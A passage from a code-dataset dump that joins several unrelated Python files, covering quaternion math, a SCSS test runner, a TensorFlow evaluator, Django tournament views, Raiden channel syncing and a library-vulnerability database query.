qrotq3(q, p):\n \"\"\"\n Rotate quaternion(s) p about the rotation described by quaternion(s) q.\n Expects a tensor of shape (*, 4) for q and a tensor of shape (*, 4) for p,\n where * denotes any number of dimensions.\n Returns a tensor of shape (*, 4).\n \"\"\"\n assert q.shape[-1] == 4\n assert p.shape[-1] == 4\n assert q.shape[:-1] == p.shape[:-1]\n\n original_shape = list(p.shape)\n q = q.view(-1, 4)\n p = p.view(-1, 4)\n pw=p[:,0]\n pv=p[:,1:4]\n\n # Compute outer product\n terms = torch.bmm(q.view(-1, 4, 1), q.view(-1, 1, 4))\n b2=terms[:,1,1]\n c2=terms[:,2,2]\n d2=terms[:,3,3]\n ab=terms[:,0,1]\n ac=terms[:,0,2]\n ad=terms[:,0,3]\n bc=terms[:,1,2]\n bd=terms[:,1,3]\n cd=terms[:,2,3]\n\n\n qvec_x=[ 1-2*c2-2*d2, 2*bc-2*ad, 2*ac+2*bd]\n qvec_y=[ 2*bc+2*ad, 1-2*b2-2*d2, 2*cd-2*ab]\n qvec_z=[ 2*bd-2*ac, 2*ab+2*cd, 1-2*b2-2*c2]\n qvec=torch.stack((torch.stack(qvec_x, dim=1), torch.stack(qvec_y, dim=1), torch.stack(qvec_z, dim=1)), dim=1)\n\n pv=torch.bmm(qvec, pv.unsqueeze(-1)).squeeze()\n\n return torch.cat((pw.unsqueeze(-1), pv), dim=1).view(original_shape)\n\ndef qeuler(q, order, epsilon=0):\n \"\"\"\n Convert quaternion(s) q to Euler angles.\n Expects a tensor of shape (*, 4), where * denotes any number of dimensions.\n Returns a tensor of shape (*, 3).\n \"\"\"\n assert q.shape[-1] == 4\n\n original_shape = list(q.shape)\n original_shape[-1] = 3\n q = q.view(-1, 4)\n\n q0 = q[:, 0]\n q1 = q[:, 1]\n q2 = q[:, 2]\n q3 = q[:, 3]\n\n if order == 'xyz':\n x = torch.atan2(2 * (q0 * q1 - q2 * q3), 1 - 2*(q1 * q1 + q2 * q2))\n y = torch.asin(torch.clamp(2 * (q1 * q3 + q0 * q2), -1+epsilon, 1-epsilon))\n z = torch.atan2(2 * (q0 * q3 - q1 * q2), 1 - 2*(q2 * q2 + q3 * q3))\n elif order == 'yzx':\n x = torch.atan2(2 * (q0 * q1 - q2 * q3), 1 - 2*(q1 * q1 + q3 * q3))\n y = torch.atan2(2 * (q0 * q2 - q1 * q3), 1 - 2*(q2 * q2 + q3 * q3))\n z = torch.asin(torch.clamp(2 * (q1 * q2 + q0 * q3), -1+epsilon, 1-epsilon))\n elif order == 'zxy':\n x = torch.asin(torch.clamp(2 * (q0 * q1 + q2 * q3), -1+epsilon, 1-epsilon))\n y = torch.atan2(2 * (q0 * q2 - q1 * q3), 1 - 2*(q1 * q1 + q2 * q2))\n z = torch.atan2(2 * (q0 * q3 - q1 * q2), 1 - 2*(q1 * q1 + q3 * q3))\n elif order == 'xzy':\n x = torch.atan2(2 * (q0 * q1 + q2 * q3), 1 - 2*(q1 * q1 + q3 * q3))\n y = torch.atan2(2 * (q0 * q2 + q1 * q3), 1 - 2*(q2 * q2 + q3 * q3))\n z = torch.asin(torch.clamp(2 * (q0 * q3 - q1 * q2), -1+epsilon, 1-epsilon))\n elif order == 'yxz':\n x = torch.asin(torch.clamp(2 * (q0 * q1 - q2 * q3), -1+epsilon, 1-epsilon))\n y = torch.atan2(2 * (q1 * q3 + q0 * q2), 1 - 2*(q1 * q1 + q2 * q2))\n z = torch.atan2(2 * (q1 * q2 + q0 * q3), 1 - 2*(q1 * q1 + q3 * q3))\n elif order == 'zyx':\n x = torch.atan2(2 * (q0 * q1 + q2 * q3), 1 - 2*(q1 * q1 + q2 * q2))\n y = torch.asin(torch.clamp(2 * (q0 * q2 - q1 * q3), -1+epsilon, 1-epsilon))\n z = torch.atan2(2 * (q0 * q3 + q1 * q2), 1 - 2*(q2 * q2 + q3 * q3))\n else:\n raise\n\n return torch.stack((x, y, z), dim=1).view(original_shape)\n\n\ndef unitary_init(in_features, out_features, rng, kernel_size=None, criterion='he'):\n\n if kernel_size is not None:\n receptive_field = np.prod(kernel_size)\n fan_in = in_features * receptive_field\n fan_out = out_features * receptive_field\n else:\n fan_in = in_features\n fan_out = out_features\n\n if criterion == 'glorot':\n s = 1. / np.sqrt(2*(fan_in + fan_out))\n elif criterion == 'he':\n s = 1. / np.sqrt(2*fan_in)\n else:\n raise ValueError('Invalid criterion: ' + criterion)\n\n if kernel_size is None:\n kernel_shape = (in_features, out_features)\n else:\n if type(kernel_size) is int:\n kernel_shape = (out_features, in_features) + tuple((kernel_size,))\n else:\n kernel_shape = (out_features, in_features) + (*kernel_size,)\n\n s = np.sqrt(3.0) * s\n\n number_of_weights = np.prod(kernel_shape)\n v_r = np.random.uniform(-s,s,number_of_weights)\n v_i = np.random.uniform(-s,s,number_of_weights)\n v_j = np.random.uniform(-s,s,number_of_weights)\n v_k = np.random.uniform(-s,s,number_of_weights)\n\n\n\n # Unitary quaternion\n for i in range(0, number_of_weights):\n norm = np.sqrt(v_r[i]**2 + v_i[i]**2 + v_j[i]**2 + v_k[i]**2)+0.0001\n v_r[i]/= norm\n v_i[i]/= norm\n v_j[i]/= norm\n v_k[i]/= norm\n\n v_r = v_r.reshape(kernel_shape)\n v_i = v_i.reshape(kernel_shape)\n v_j = v_j.reshape(kernel_shape)\n v_k = v_k.reshape(kernel_shape)\n\n return (v_r, v_i, v_j, v_k)\n\ndef random_init(in_features, out_features, rng, kernel_size=None, criterion='glorot'):\n\n if kernel_size is not None:\n receptive_field = np.prod(kernel_size)\n fan_in = in_features * receptive_field\n fan_out = out_features * receptive_field\n else:\n fan_in = in_features\n fan_out = out_features\n\n if criterion == 'glorot':\n s = 1. / np.sqrt(2*(fan_in + fan_out))\n elif criterion == 'he':\n s = 1. / np.sqrt(2*fan_in)\n else:\n raise ValueError('Invalid criterion: ' + criterion)\n\n if kernel_size is None:\n kernel_shape = (in_features, out_features)\n else:\n if type(kernel_size) is int:\n kernel_shape = (out_features, in_features) + tuple((kernel_size,))\n else:\n kernel_shape = (out_features, in_features) + (*kernel_size,)\n\n number_of_weights = np.prod(kernel_shape)\n v_r = np.random.uniform(0.0,1.0,number_of_weights)\n v_i = np.random.uniform(0.0,1.0,number_of_weights)\n v_j = np.random.uniform(0.0,1.0,number_of_weights)\n v_k = np.random.uniform(0.0,1.0,number_of_weights)\n\n v_r = v_r.reshape(kernel_shape)\n v_i = v_i.reshape(kernel_shape)\n v_j = v_j.reshape(kernel_shape)\n v_k = v_k.reshape(kernel_shape)\n\n weight_r = v_r * s\n weight_i = v_i * s\n weight_j = v_j * s\n weight_k = v_k * s\n return (weight_r, weight_i, weight_j, weight_k)\n\n\ndef quaternion_init(in_features, out_features, rng, kernel_size=None, criterion='glorot'):\n\n if kernel_size is not None:\n receptive_field = np.prod(kernel_size)\n fan_in = in_features * receptive_field\n fan_out = out_features * receptive_field\n else:\n fan_in = in_features\n fan_out = out_features\n\n if criterion == 'glorot':\n s = 1. / np.sqrt(2*(fan_in + fan_out))\n elif criterion == 'he':\n s = 1. / np.sqrt(2*fan_in)\n else:\n raise ValueError('Invalid criterion: ' + criterion)\n\n rng = RandomState(np.random.randint(1,1234))\n\n\n # Generating randoms and purely imaginary quaternions :\n if kernel_size is None:\n kernel_shape = (in_features, out_features)\n else:\n if type(kernel_size) is int:\n kernel_shape = (out_features, in_features) + tuple((kernel_size,))\n else:\n kernel_shape = (out_features, in_features) + (*kernel_size,)\n\n modulus = chi.rvs(4,loc=0,scale=s,size=kernel_shape)\n\n# modulus= rng.uniform(size=kernel_shape)\n number_of_weights = np.prod(kernel_shape)\n\n\n v_i = np.random.normal(0,1.0,number_of_weights)\n v_j = np.random.normal(0,1.0,number_of_weights)\n v_k = np.random.normal(0,1.0,number_of_weights)\n\n # Purely imaginary quaternions unitary\n for i in range(0, number_of_weights):\n \tnorm = np.sqrt(v_i[i]**2 + v_j[i]**2 + v_k[i]**2 +0.0001)\n \tv_i[i]/= norm\n \tv_j[i]/= norm\n \tv_k[i]/= norm\n v_i = v_i.reshape(kernel_shape)\n v_j = v_j.reshape(kernel_shape)\n v_k = v_k.reshape(kernel_shape)\n\n phase = rng.uniform(low=-np.pi, high=np.pi, size=kernel_shape)\n\n weight_r = modulus * np.cos(phase)\n weight_i = modulus * v_i*np.sin(phase)\n weight_j = modulus * v_j*np.sin(phase)\n weight_k = modulus * v_k*np.sin(phase)\n\n return (weight_r, weight_i, weight_j, weight_k)\n\ndef create_dropout_mask(dropout_p, size, rng, as_type, operation='linear'):\n if operation == 'linear':\n mask = rng.binomial(n=1, p=1-dropout_p, size=size)\n return Variable(torch.from_numpy(mask).type(as_type))\n else:\n raise Exception(\"create_dropout_mask accepts only 'linear'. Found operation = \"\n + str(operation))\n\ndef affect_init(q_weight, init_func, rng, init_criterion):\n# if r_weight.size() != i_weight.size() or r_weight.size() != j_weight.size() or \\\n# r_weight.size() != k_weight.size() :\n# raise ValueError('The real and imaginary weights '\n# 'should have the same size . Found: r:'\n# + str(r_weight.size()) +' i:'\n# + str(i_weight.size()) +' j:'\n# + str(j_weight.size()) +' k:'\n# + str(k_weight.size()))\n#\n# elif r_weight.dim() != 2:\n# raise Exception('affect_init accepts only matrices. Found dimension = '\n# + str(r_weight.dim()))\n kernel_size = None\n r, i, j, k = init_func(q_weight.size(0), q_weight.size(1), rng, kernel_size, init_criterion)\n r, i, j, k = torch.from_numpy(r), torch.from_numpy(i), torch.from_numpy(j), torch.from_numpy(k)\n q_weight.data= torch.stack((r.type_as(q_weight.data),i.type_as(q_weight.data),j.type_as(q_weight.data),k.type_as(q_weight.data)),2)\n\n# r_weight.data = r.type_as(r_weight.data)\n# i_weight.data = i.type_as(i_weight.data)\n# j_weight.data = j.type_as(j_weight.data)\n# k_weight.data = k.type_as(k_weight.data)\n\n\n\n\nif __name__ == '__main__':\n p=torch.rand(16,64,4)\n pool_grid=torch.FloatTensor([[-1.0, -1.0, -1.0], [1.0, -1.0, -1.0],\n [-1.0, 1.0, -1.0], [1.0, 1.0, -1.0],\n [-1.0, -1.0, 1.0], [1.0, -1.0, 1.0],\n [-1.0, 1.0, 1.0], [1.0, 1.0, 1.0]])\n#\n p=p.unsqueeze(-2)\n p=p.expand(p.size(0), p.size(1),8, p.size(3)).contiguous()\n pool_grid=pool_grid.view(1,1,8,3)\n pool_grid=pool_grid.expand(p.size(0), p.size(1),8, 3).contiguous()\n\n# p=p.cuda()\n# pool_grid=pool_grid.cuda()\n test1=qrotv(p, pool_grid)\n\n\n test3=qrotv3(p, pool_grid)\n print(test1[0,0,])\n print(test3[0,0,])\n\n input_lrf=torch.rand(16,64,8,4)\n t_ij=torch.rand(16,64,8,32,4)\n input_lrf=input_lrf.unsqueeze(-2)\n input_lrf=input_lrf.expand(t_ij.size(0), t_ij.size(1), t_ij.size(2), 32, t_ij.size(4)).contiguous()\n test2=qrotq(t_ij, input_lrf)\n test4=qrotq3(t_ij, input_lrf)\n","sub_path":"models/quat_ops.py","file_name":"quat_ops.py","file_ext":"py","file_size_in_byte":14430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84441185","text":"\"\"\"Evaluates all the tests that live in `scss/tests/files`.\n\nA test is any file with a `.scss` extension. It'll be compiled, and the output\nwill be compared to the contents of a file named `foo.css`.\n\nCurrently, test files must be nested exactly one directory below `files/`.\nThis limitation is completely arbitrary. Files starting with '_' are skipped.\n\n\"\"\"\n\nfrom __future__ import absolute_import, unicode_literals\n\nimport os\nimport logging\nimport sys\nfrom importlib import import_module\n\nimport six\n\nimport scss\n\n\nif six.PY2:\n from io import open\n\n\nconsole = logging.StreamHandler()\nlogger = logging.getLogger('scss')\nlogger.setLevel(logging.ERROR)\nlogger.addHandler(console)\n\n\ndef test_pair_programmatic(scss_file_pair):\n scss_fn, css_fn = scss_file_pair\n\n # look for a python module related to the pair and execute it if found\n mod = None\n cfg_script = scss_fn.replace('.scss', '.py')\n if os.path.exists(cfg_script):\n sys.path[0:0] = [os.path.dirname(scss_fn)]\n mod = import_module(os.path.splitext(os.path.split(scss_fn)[1])[0])\n getattr(mod, 'setUp', lambda: None)()\n sys.path = sys.path[1:]\n\n with open(scss_fn) as fh:\n source = fh.read()\n with open(css_fn, 'r', encoding='utf8') as fh:\n expected = fh.read()\n\n directory, _ = os.path.split(scss_fn)\n include_dir = os.path.join(directory, 'include')\n scss.config.STATIC_ROOT = os.path.join(directory, 'static')\n\n try:\n compiler = scss.Scss(scss_opts=dict(style='expanded'), search_paths=[include_dir, directory])\n actual = compiler.compile(source)\n\n getattr(mod, 'tearDown', lambda:None)()\n\n # Normalize leading and trailing newlines\n actual = actual.strip('\\n')\n expected = expected.strip('\\n')\n\n assert expected == actual\n\n finally:\n # cleanup generated assets if any\n assets_dir = os.path.join(directory, 'static', 'assets')\n if os.path.isdir(assets_dir):\n for x in os.listdir(assets_dir):\n if x != '.placeholder':\n os.remove(os.path.join(assets_dir, x))\n\ndef test_rel_import():\n\n scss_vars = {}\n _scss = scss.Scss(scss_vars=scss_vars)\n\n actual = _scss.compile(scss_file=os.path.join(os.path.dirname(__file__),\n 'files', 'general',\n 'relative-import.fscss'))\n\n expected = open(os.path.join(os.path.dirname(__file__), 'files',\n 'general', 'relative-import.css')).read()\n\n assert expected == actual\n","sub_path":"scss/tests/test_files.py","file_name":"test_files.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"502515817","text":"import tensorflow as tf\r\nimport time\r\nimport model_helper as helper\r\nfrom utils import misc_util as misc\r\nimport os\r\n\r\n\r\ntf.logging.set_verbosity(tf.logging.INFO)\r\n\r\n\r\ndef get_model_creator(model_type):\r\n # from models.vgg16 import VGG16\r\n from models.inception_v3 import InceptionV3\r\n from models.vgg_16 import VGG16B\r\n from models.resnet_v1 import ResNetV1\r\n if model_type == \"VGG_16\":\r\n return VGG16B\r\n elif model_type == \"InceptionV3\":\r\n return InceptionV3\r\n elif model_type == \"ResNetV1\":\r\n return ResNetV1\r\n\r\n\r\ndef evaluate(hparams, scope=None, target_session=\"\", ckpt_path=None,\r\n summary_writer=None, global_step_=0, alternative=False):\r\n if alternative:\r\n out_dir = os.path.join(hparams.base_dir, \"train\")\r\n else:\r\n out_dir = os.path.join(hparams.base_dir, \"eval\")\r\n ckpt_path = os.path.join(hparams.base_dir, \"ckpt\")\r\n if not misc.check_file_existence(out_dir):\r\n tf.gfile.MakeDirs(out_dir)\r\n tf.logging.info(\"All eval relevant results will be put in %s\" % out_dir)\r\n\r\n # Create model\r\n model_creator = get_model_creator(hparams.model_type)\r\n eval_model = helper.create_eval_model(model_creator,\r\n hparams, scope)\r\n config_proto = misc.get_config_proto(\r\n log_device_placement=hparams.log_device_placement,\r\n num_intra_threads=hparams.num_intra_threads,\r\n num_inter_threads=hparams.num_inter_threads)\r\n eval_sess = tf.Session(\r\n target=target_session, config=config_proto,\r\n graph=eval_model.graph)\r\n tf.logging.info(\"Create model successfully\")\r\n with eval_model.graph.as_default():\r\n loaded_eval_model, global_step = helper.create_or_load_model(\r\n eval_model.model,\r\n ckpt_path,\r\n eval_sess)\r\n if global_step > 0:\r\n if global_step_ > 0:\r\n assert global_step_ == global_step\r\n tf.logging.info(\"Loading model from global step %d to evaluate\" % global_step)\r\n else:\r\n tf.logging.info(\"With global step is 0, can not execute evaluation\")\r\n return\r\n # Summary writer\r\n if summary_writer is None:\r\n summary_name = \"eval_summary\"\r\n summary_path = os.path.join(out_dir, summary_name)\r\n if not tf.gfile.Exists(summary_path):\r\n tf.gfile.MakeDirs(summary_path)\r\n summary_writer = tf.summary.FileWriter(\r\n os.path.join(out_dir, summary_name), eval_model.graph)\r\n eval_sess.run(eval_model.data_wrapper.initializer)\r\n tf.logging.info(\"Ready to eval\")\r\n step = 0\r\n accuracies = 0.\r\n while True:\r\n start_time = time.time()\r\n try:\r\n tf.logging.info(\"Start eval step:%d\" % step)\r\n results = loaded_eval_model.eval(eval_sess)\r\n summary_writer.add_summary(results.summary, global_step)\r\n tf.logging.info(\"Evaluation step %d, accuracy is %f, %s\"\r\n % (step, results.accuracy, time.ctime()))\r\n accuracies += results.accuracy\r\n step += 1\r\n except tf.errors.OutOfRangeError:\r\n avg_accuracy = accuracies / step\r\n tf.logging.info(\"After %d steps of evaluation, accuracy is %f \"\r\n % (step, avg_accuracy, time.time()-start_time))\r\n tf.logging.info(\"Finish evaluating\")\r\n summary_writer.close()\r\n break\r\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321943727","text":"from django.shortcuts import get_object_or_404\nfrom django.views.generic import CreateView, UpdateView, ListView,\\\n DeleteView, View\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.core.exceptions import PermissionDenied\nimport random\n# Create your views here.\n\nfrom apps.tournament.models import Tournament, Team, Round, Match\nfrom apps.tournament.forms import RoundCreateForm, TournCreateForm\n\n\nclass StaffOnly(object):\n\n def dispatch(self, request, *args, **kwargs):\n if not request.user.is_staff:\n raise PermissionDenied\n return super(StaffOnly, self).dispatch(request, *args, **kwargs)\n\n\nclass CreateTournamentView(StaffOnly, CreateView):\n\n model = Tournament\n template_name = 'tourn_create.html'\n success_url = '/tournament/admin/'\n form_class = TournCreateForm\n\n def form_valid(self, form):\n self.object = form.save()\n if form.cleaned_data['generate_team']:\n pairs = generate_player_pair(self.object.tour_players.all())\n for pair in pairs:\n team = Team.objects.create(tournament=self.object)\n for i in pair:\n team.team_players.add(i)\n team.generate_name()\n team.save()\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass ListTournamentView(ListView):\n\n model = Tournament\n template_name = 'tourn_list.html'\n context_object_name = 'tournaments'\n\n\nclass DeleteTournamentView(StaffOnly, DeleteView):\n\n model = Tournament\n success_url = '/tournament/admin/'\n\n\nclass EditTournamentView(StaffOnly, UpdateView):\n\n model = Tournament\n template_name = 'tourn_edit.html'\n fields = ('name',)\n success_url = '/tournament/admin/'\n\n def get_context_data(self, **kwargs):\n context = super(EditTournamentView, self).get_context_data(**kwargs)\n context['teams'] = self.get_object().team_set\n context['rounds'] = self.get_object().round_set\n return context\n\n\nclass CreateRoundView(StaffOnly, CreateView):\n\n model = Round\n template_name = 'round_create.html'\n form_class = RoundCreateForm\n\n def get_success_url(self):\n return '/tournament/edit/%s/' % (self.tourn.pk)\n\n def dispatch(self, *args, **kwargs):\n self.tourn = get_object_or_404(Tournament, pk=kwargs['tourn'])\n return super(CreateRoundView, self).dispatch(*args, **kwargs)\n\n def get_form(self, form_class):\n form = super(CreateRoundView, self).get_form(form_class)\n form.fields['round_team'].queryset = self.tourn.team_set.all()\n return form\n\n def form_valid(self, form):\n self.object = form.save(commit=False)\n self.object.tournament = self.tourn\n self.object.save()\n for team in form.cleaned_data['round_team']:\n self.object.round_team.add(team)\n self.object.save()\n if self.object.round_type == 'reg':\n pairs = generate_matches_pairs(self.object.round_team.all())\n else:\n pairs = generate_play_off_pairs(self.object.round_team.all())\n for i in range(form.cleaned_data['match_count']):\n for pair in pairs:\n Match.objects.create(team1=pair[0], team2=pair[1],\n match_round=self.object,\n tournament=self.tourn)\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass RoundListView(ListView):\n\n model = Round\n template_name = 'round_list.html'\n context_object_name = 'rounds'\n\n def get_queryset(self):\n self.tourn = get_object_or_404(Tournament, pk=self.kwargs['tourn'])\n return Round.objects.filter(tournament=self.tourn)\n\n\nclass MatchesListView(ListView):\n model = Match\n template_name = 'matches_list.html'\n context_object_name = 'matches'\n\n def get_queryset(self):\n self.round = get_object_or_404(Round, pk=self.kwargs['round'])\n return Match.objects.filter(match_round=self.round)\n\n def get_context_data(self, **kwargs):\n context = super(MatchesListView, self).get_context_data(**kwargs)\n context['round'] = self.round\n return context\n\n\nclass MatchesAdminEditView(StaffOnly, MatchesListView):\n\n template_name = 'matches_admin.html'\n\n\nclass AdminTournamentView(StaffOnly, ListView):\n\n model = Tournament\n template_name = 'admin_main.html'\n context_object_name = 'tournaments'\n\n\nclass GetMatchView(View):\n\n def get(self, request):\n match_pk = request.GET.get('pk')\n match = Match.objects.get(pk=match_pk)\n res = {}\n res['name_1'] = match.team1.name\n res['name_2'] = match.team2.name\n res['score_1'] = match.team_1_hit\n res['score_2'] = match.team_2_hit\n return JsonResponse(res)\n\n\nclass GetMatchListView(View):\n\n def get(self, request):\n round_pk = request.GET.get('pk')\n round_entry = Round.objects.get(pk=round_pk)\n res = {}\n for i in round_entry.match_set.all():\n res[i.pk] = i.show_score()\n return JsonResponse(res)\n\n\nclass SetMatchScore(View):\n\n def post(self, request):\n match_pk = request.POST.get('pk')\n score_1 = request.POST.get('score_1')\n score_2 = request.POST.get('score_2')\n match = Match.objects.get(pk=match_pk)\n match.set_result(score_1, score_2)\n res = {}\n res['pk'] = match_pk\n res['score'] = '%s : %s' % (score_1, score_2)\n return JsonResponse(res)\n\n\nclass TournamentTable(ListView):\n\n model = Match\n tempalte_name = 'tourn_table'\n\n\ndef generate_player_pair(query):\n random_index = int(len(query)/5)\n res = []\n first_index = 0\n last_index = random_index\n one_more = True\n middle_index = len(query)/2\n while one_more:\n first_query = list(query[first_index:last_index])\n last_query = list(query.reverse()[first_index:last_index])\n for i in range(len(first_query)):\n first_choice = random.choice(first_query)\n first_query.remove(first_choice)\n second_choice = random.choice(last_query)\n last_query.remove(second_choice)\n res.append((first_choice, second_choice))\n if last_index == middle_index:\n one_more = False\n if last_index + random_index <= middle_index:\n first_index += random_index\n last_index += random_index\n else:\n new_random_index = middle_index - last_index\n first_index += random_index\n last_index += new_random_index\n return res\n\n\ndef generate_matches_pairs(query):\n res = []\n query = list(query)\n for i in query:\n for j in query[query.index(i)+1:]:\n res.append((i, j))\n return res\n\n\ndef generate_play_off_pairs(query):\n res = []\n query = list(query)\n for i in range(0, len(query), 2):\n res.append((query[i], query[i+1]))\n return res\n","sub_path":"apps/tournament/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344318266","text":"import time\n\ndef update_index(index_filename, left, right):\n '''Append a record to the index.'''\n\n # Read existing data.\n with open(index_filename, 'r') as raw:\n reader = csv.reader(raw)\n records = []\n for r in reader:\n records.append(r)\n \n # Create new record.\n timestamp = time.strftime('%Y-%m-%d')\n data_filename = left + '-' + right + '.csv'\n new_record = (timestamp, left, right, data_filename)\n \n # Save.\n records.append(new_record)\n with open(index_filename, 'w') as raw:\n writer = csv.writer(raw)\n writer.writerows(records)\n","sub_path":"src/syndicate/make_index.py","file_name":"make_index.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"411625083","text":"import logging\nimport time\n\nfrom django.core.management.base import BaseCommand\nfrom web3 import Web3\n\nfrom hub20.apps.blockchain.client import get_web3\nfrom hub20.apps.ethereum_money.client import get_token_information\nfrom hub20.apps.ethereum_money.models import EthereumToken\nfrom hub20.apps.raiden import models\nfrom hub20.apps.raiden.client import RaidenClient, RaidenConnectionError\nfrom hub20.apps.raiden.contracts import get_token_network_registry_contract\n\nlogger = logging.getLogger(__name__)\n\n\ndef sync_token_networks(client: RaidenClient, w3: Web3):\n logger.info(\"Updating Token Networks\")\n known_tokens = client.raiden.token_networks.values_list(\"token__address\", flat=True)\n\n chain_id = int(w3.net.version)\n\n for token_address in client.get_token_addresses():\n if token_address in known_tokens:\n continue\n\n logger.info(f\"Getting information about token on {token_address}\")\n token_data = get_token_information(w3=w3, address=token_address)\n token = EthereumToken.make(address=token_address, chain_id=chain_id, **token_data)\n token_network_registry_contract = get_token_network_registry_contract(w3)\n token_network = models.TokenNetwork.make(token, token_network_registry_contract)\n client.raiden.token_networks.add(token_network)\n\n\ndef sync_channels(client: RaidenClient):\n logger.info(\"Updating Channels\")\n for channel_data in client.get_channels():\n channel = models.Channel.make(client.raiden, **channel_data)\n logger.info(f\"{channel} information synced\")\n\n\ndef sync_payments(client: RaidenClient):\n for channel in client.raiden.channels.all():\n logger.info(f\"Getting new payments from {channel}\")\n for payment_data in client.get_new_payments(channel):\n models.Payment.make(channel, **payment_data)\n\n\nclass Command(BaseCommand):\n help = \"Connects to Raiden via REST API to collect information about new transfers\"\n\n def handle(self, *args, **options):\n w3 = get_web3()\n\n while True:\n for raiden in models.Raiden.objects.all():\n client = RaidenClient(raiden)\n try:\n sync_token_networks(client, w3)\n sync_channels(client)\n sync_payments(client)\n except RaidenConnectionError as exc:\n logger.warn(str(exc))\n time.sleep(5)\n except Exception as exc:\n logger.exception(exc)\n time.sleep(3)\n","sub_path":"hub20/apps/raiden/management/commands/sync_raiden.py","file_name":"sync_raiden.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635954754","text":"from lib.database import get_postgres_connection\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nimport datetime\npostgres = get_postgres_connection()\nPOSTGRES_HOST = postgres.host\nPOSTGRES_PORT = postgres.port\nPOSTGRES_USER = postgres.user\nPOSTGRES_PWD = postgres.password\nPOSTGRES_DB = postgres.db\nBase = automap_base()\n# Create engine, session\nengine = create_engine(\n \"postgresql+psycopg2://\"\n + POSTGRES_USER\n + \":\"\n + POSTGRES_PWD\n + \"@\"\n + POSTGRES_HOST\n + \":\"\n + POSTGRES_PORT\n + \"/\"\n + POSTGRES_DB,\n client_encoding=\"utf-8\",\n)\nsession = Session(engine)\n# Reflect the tables\nBase.prepare(engine, reflect=True)\n# Mapped classes are now created with names by default\n# matching that of the table name.\nScantistLibraryVersion = Base.classes.scantist_library_version\nScantistLibrary = Base.classes.scantist_library\nScantistLibraryVersionIssue = Base.classes.scantist_libraryversionissue\nScantistSecurityIssue = Base.classes.scantist_securityissue\n\n\ndef get_updated_vul_info(timestamp=datetime.datetime(2017, 7, 25), lib_only=False):\n \"\"\"\n start from issues from a timestamp which is stored last time we did this update,\n get all related versions and their libname, vendor, version number\n \"\"\"\n updated_vul_ver_info = (\n session.query(\n ScantistLibrary.name,\n ScantistLibrary.vendor,\n ScantistLibraryVersion.version_number,\n ScantistSecurityIssue.public_id,\n ScantistLibraryVersionIssue.is_valid,\n )\n .filter(\n ScantistLibraryVersionIssue.processed_time > timestamp,\n ScantistLibrary.platform == 'Go',\n )\n .join(\n ScantistLibraryVersion,\n ScantistLibrary.id == ScantistLibraryVersion.library_id,\n )\n .join(\n ScantistLibraryVersionIssue,\n ScantistLibraryVersion.id\n == ScantistLibraryVersionIssue.library_version_id,\n )\n .join(\n ScantistSecurityIssue,\n ScantistLibraryVersionIssue.security_issue_id\n == ScantistSecurityIssue.id,\n )\n .order_by(ScantistLibraryVersionIssue.processed_time.asc())\n )\n unique_vul_node = {}\n for update in updated_vul_ver_info:\n if (\n not f\"{update[1]}-{update[0]}-{update[2]}-{update[3]}\"\n in unique_vul_node\n ):\n unique_vul_node[\n f\"{update[1]}-{update[0]}-{update[2]}-{update[3]}\"\n ] = update\n\n add_vul_rel = filter(lambda x: x[4] == True, list(unique_vul_node.values()))\n del_vul_rel = filter(lambda x: x[4] == False, list(unique_vul_node.values()))\n\n add_node = []\n del_node = {}\n\n for update in add_vul_rel:\n node = next((x for x in add_node if x[\"public_id\"] == update[3]), None)\n if node:\n if update[1] + \":\" + update[0] in node[\"affects\"]:\n node[\"affects\"][update[1] + \":\" + update[0]].append(update[2])\n else:\n node[\"affects\"][update[1] + \":\" + update[0]] = [update[2]]\n else:\n add_node.append(\n {\n \"public_id\": update[3],\n \"vulnerabilityId\": update[3],\n \"affects\": {update[1] + \":\" + update[0]: [update[2]]},\n }\n )\n libaffects_list = []\n affect_list = []\n vulnerable_lib = []\n vul_node = add_node\n vul_node_list = []\n for vul in vul_node:\n for libvendor, vers in vul[\"affects\"].items():\n for ver in vers:\n affect_list.append((vul['public_id'], libvendor.lstrip(':')+':'+ver))\n libaffects_list.append((vul['public_id'], libvendor.lstrip(':')))\n vulnerable_lib.append(libvendor.lstrip(':'))\n vul_node_list.append(vul['public_id'])\n vulnerable_lib = list(set(vulnerable_lib))\n libaffects_list = list(set(libaffects_list))\n affect_list = list(set(affect_list))\n vul_node_list =list(set(vul_node_list))\n if lib_only:\n return vulnerable_lib\n else:\n return libaffects_list, affect_list, vul_node_list\n\n","sub_path":"calculating_affected_libs/get_libaffect.py","file_name":"get_libaffect.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"344650468","text":"\"\"\"lstm_utils.py contains utility functions for running LSTM Baselines.\"\"\"\n\nimport os\nfrom typing import Any, Dict, List, Tuple\nimport torch\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset\nfrom .map_features_utils import MapFeaturesUtils\n\nfrom .baseline_config import *\n\nuse_cuda = torch.cuda.is_available()\nif use_cuda:\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\n\n\ncmd_codes = dict(m=0, l=1, c=2, a=3, EOS=4, SOS=5, z=6)\nCOLOR_IDXS = slice(1,6)\n\n\ndef linear_cmd_to_tensor(cmd_index, end_position: tuple, start_position: tuple = None, pad=-1):\n start_pos = start_position if start_position is not None else (0, 0)\n return torch.tensor(\n [cmd_index, *([pad] * 5), start_pos[0], start_pos[1], *([pad] * 4), end_position[0], 